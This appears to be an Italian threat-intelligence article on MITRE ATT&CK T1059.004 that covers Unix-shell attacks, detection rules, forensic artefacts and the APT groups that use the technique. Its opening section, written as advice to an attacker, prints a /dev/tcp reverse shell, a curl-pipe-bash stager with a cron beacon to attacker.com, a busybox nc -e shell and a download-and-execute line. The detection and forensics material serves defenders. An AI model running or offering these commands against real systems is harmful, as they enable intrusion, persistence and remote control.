Shell Unix: Command/Scripting Interpreter - Unix Shell (T1059.004)

L'accesso a una shell Unix apre infinite possibilità offensive. Il comando più basilare per ottenere una reverse shell è sorprendentemente semplice:

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Questa singola riga crea una connessione interattiva verso il tuo server di comando e controllo. Ma le tecniche moderne vanno oltre. Scattered Spider ha dimostrato l'efficacia di combinare shell access con tool legittimi come Teleport, installando il remote access tool direttamente su vCenter Server Appliance compromessi.

Per replicare attacchi più sofisticati, considera la creazione di script modulari. TeamTNT utilizza questa strategia per deployment automatizzati:

#!/bin/bash
curl -s http://attacker.com/stage2.sh | bash
echo "*/5 * * * * wget -q -O- http://attacker.com/beacon | sh" | crontab -

Nei sistemi embedded o ESXi, dove BusyBox fornisce una shell minimale, le tecniche devono adattarsi. COATHANGER sfrutta proprio BusyBox per stabilire reverse shell persistenti su dispositivi IoT compromessi. Il comando diventa:

/bin/busybox nc -e /bin/sh attacker.com 4444

Per ambienti macOS, Contagious Interview ha mostrato l'efficacia di bash downloader mascherati. Lo script coremedia.sh scarica ed esegue payload secondari mantenendo un profilo basso:

curl -fsL "$url" > /tmp/.cache && chmod +x /tmp/.cache && /tmp/.cache

La chiave sta nell'adattare i comandi al contesto specifico del target, sfruttando le peculiarità di ogni variante Unix shell presente nel sistema vittima.

La detection efficace delle shell Unix richiede un approccio comportamentale multi-livello. Non basta monitorare l'esecuzione di /bin/bash o /bin/sh - questi processi sono onnipresenti nei sistemi Unix.

Il primo livello di detection si concentra sul contesto di esecuzione. Una shell spawned da processi inusuali come curl, apache2 o mail rappresenta un indicatore ad alta fedeltà. Configura alert per catturare pattern come:

ParentProcess NOT IN (terminal, sshd, cron) AND 
ProcessName IN (/bin/bash, /bin/sh, /bin/zsh)

Per sistemi Linux, auditd fornisce visibilità granulare attraverso il monitoraggio delle syscall execve. La configurazione deve catturare l'esecuzione di shell da directory sospette:

-a always,exit -F arch=b64 -S execve -F exe=/bin/bash -F dir=/tmp -k suspicious_shell

Nei sistemi macOS, la situazione diventa più complessa. Shell eseguite al di fuori di Terminal.app o spawned da Preview.app indicano potenziale compromissione. OSX/Shlayer utilizza esattamente questa tecnica, eseguendo comandi come:

sh -c tail -c +1381

Per ambienti ESXi, il focus si sposta su BusyBox e ash shell. Qualsiasi esecuzione di shell da utenti non-root o durante finestre temporali anomale deve generare alert immediati. UNC3886 ha dimostrato come bash script possano installare VIB malevoli, rendendo critico il monitoraggio di:

ProcessName = /bin/ash AND 
UserName != root AND 
TimeOfDay NOT IN MaintenanceWindow

La gestione dei falsi positivi richiede baseline accurate. Script di automazione legittimi generano rumore significativo, ma pattern come loop infiniti, download commands o reverse shell syntax rimangono indicatori affidabili di attività malevola.

L'analisi forense di attacchi basati su Unix shell richiede attenzione meticolosa agli artefatti lasciati dal sistema. La bash history rappresenta solo la punta dell'iceberg - attaccanti sofisticati la disabilitano immediatamente con unset HISTFILE.

Gli artefatti più affidabili risiedono nei log di sistema. Su Linux, /var/log/auth.log e /var/log/secure registrano gli accessi SSH che precedono l'esecuzione di shell interattive. Aquatic Panda ha dimostrato questo pattern, accedendo via SSH prima di deployare versioni Linux di Winnti attraverso shell script malevoli.

La ricostruzione della timeline deve considerare i file temporanei. Directory come /tmp e /dev/shm ospitano frequentemente script di staging. OSX_OCEANLOTUS.D droppa payload base64-encoded proprio in /tmp, lasciando tracce recuperabili anche dopo la cancellazione attraverso tecniche di file carving.

Per sistemi compromessi da Rocke, l'analisi deve estendersi ai cron jobs modificati. Il gruppo utilizza shell script per ottenere persistenza prima di eseguire cryptocurrency miner:

grep -r "wget\|curl" /var/spool/cron/
find /etc/cron* -type f -mtime -30 -exec ls -la {} \;

Su macOS, l'analisi dei LaunchAgents e LaunchDaemons rivela script di persistenza. CoinTicker stabilisce reverse shell attraverso bash script embedded in plist files. L'estrazione richiede:

plutil -p ~/Library/LaunchAgents/.plist | grep -E "bash|sh"*

La correlazione temporale tra login SSH, creazione di file in directory temporanee ed esecuzione di comandi sospetti permette di ricostruire l'intera catena di attacco, identificando il patient zero e la progressione dell'intrusione attraverso l'infrastruttura.

L'analisi dei gruppi APT che utilizzano Unix shell rivela pattern distintivi e sovrapposizioni operative significative. APT41 rappresenta l'archetipo dell'attaccante sofisticato, combinando l'uso di shell Linux con l'exploitation di vulnerabilità zero-day come CVE-2019-19871. Il gruppo dimostra preferenza per reconnaissance approfondita pre-exploitation attraverso comandi di system survey.

Volt Typhoon emerge come innovatore nell'uso di shell ibride. Il loro tool Brightmetricagent.exe integra una CLI library capace di leveraggiare Z Shell (zsh), mostrando adattamento alle moderne distribuzioni Linux che hanno migrato da bash. La campagna KV Botnet Activity associata rivela l'uso estensivo di Bash script per l'installazione di botnet su dispositivi SOHO end-of-life.

L'overlap geografico mostra concentrazioni significative. Gruppi China-nexus come UNC3886 e Velvet Ant condividono tecniche di deployment attraverso shell script su appliance di rete. VELVETSTING, il tool custom di Velvet Ant, parsa comandi encoded prima dell'esecuzione via Unix shell su dispositivi F5 BIG-IP compromessi.

Le campagne recenti rivelano trend evolutivi. Operation MidnightEclipse (marzo-aprile 2024) ha innovato pipando output da stdout direttamente a bash, tecnica che bypassa detection tradizionali. Quad7 Activity dimostra la scalabilità industriale: migliaia di router compromessi espongono shell access su porte non standard (7777, 63256) con banner distintivi come "xlogin" e "alogin".

La previsione delle mosse future indica convergenza verso:

• Targeting aumentato di appliance ESXi e vSphere
• Uso di shell minimali BusyBox per footprint ridotto
• Automazione attraverso script modulari per deployment massivi
• Shift verso zsh e shell alternative per evasion

Tecnica documentata in MITRE ATT&CK T1059.004. Dati estratti da 5 campagne (KV Botnet, MidnightEclipse, FLORAHOX, Quad7, RedPenguin) e detection signatures DET0384. Riferimenti a 10 gruppi APT e 45 malware families analizzati.